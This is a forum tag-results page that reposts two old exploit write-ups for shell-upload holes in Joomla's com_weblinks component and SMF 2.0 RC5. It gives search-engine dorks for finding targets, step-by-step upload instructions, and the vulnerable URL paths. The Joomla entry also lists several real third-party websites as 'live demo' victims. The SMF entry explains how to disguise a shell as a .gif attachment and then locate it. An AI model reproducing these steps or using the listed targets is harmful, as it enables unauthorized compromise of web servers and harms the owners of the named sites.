Search the Community
Showing results for tags 'shell upload'.
-
################################################################ # Exploit Title : Joomla com_weblinks Shell Upload Vulnerability # Exploit Author : howucan # Website : http://howucan.gr # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks # Software link : http://extensions.joomla.org/extensions/extension/official-extensions/weblinks # Tested on: [ Kali Linux 2 ] # Date: 2016/07/24 # video Proof : https://www.youtube.com/watch?v=rHM8XJUhBzQ # ###################### # [+] PoC : ###################### # 1 Select A Website From The Dork Above # 2 http://localhost/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # 3 Just Upload your Shell or Txt or Image to Upload Field # 4 Shell Directory : http://localhost/site/images/shell.txt # Ex http://www.verenikelife2009.gr/images/a.txt ###################### # [+] Live Demo: # http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= ################################################################# via
-
### # Title : SMF 2.0 RC5 Remote Shell Upload Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : php # Impact : Remote Shell Upload # Tested on : Windows XP sp3 FR ## # [?] ~ ********* In The name of Allah ************ ### # Go0Gle D0rk : "Powered by SMF 2.0 RC5 " # Exploit : You Are Can Upload The Shell in (attachments) Folder from 'SMF 2.0 RC5' (+) In Any Topic .. Submit New Reply and Upload Shell (*.gif) on Attachment (+) After Reply .. You Are Can Access to Shell in : > http://[target/Path]/attachments/{fileID}_{fileHASH} > The HASH Is encoder by : SHA1 (+) Because the 'SMF 2.0 RC5' Change the Any Attach name Ex : '1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca' << This is From Ex file I'm uploaded From My Local SMF (+) After You Are Detect The SHA HASH .. access in the shell ! Usage : http://127.0.0.1:8888/smf/attachments/1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca OR access in this url : > http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image but this access with URL not succeeding always # ** In The Peace of Allah ** ================================================================================================= #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # 1337day.com * Packet Storm ? Full Disclosure Information Security * exploit-db.com * bugsearch.net * exploit-id.com # Metasploit Framework Penetration Testing Software | Metasploit Project * SecurityReason.com - Our Reason is Security * All Security and Exploits Webs ...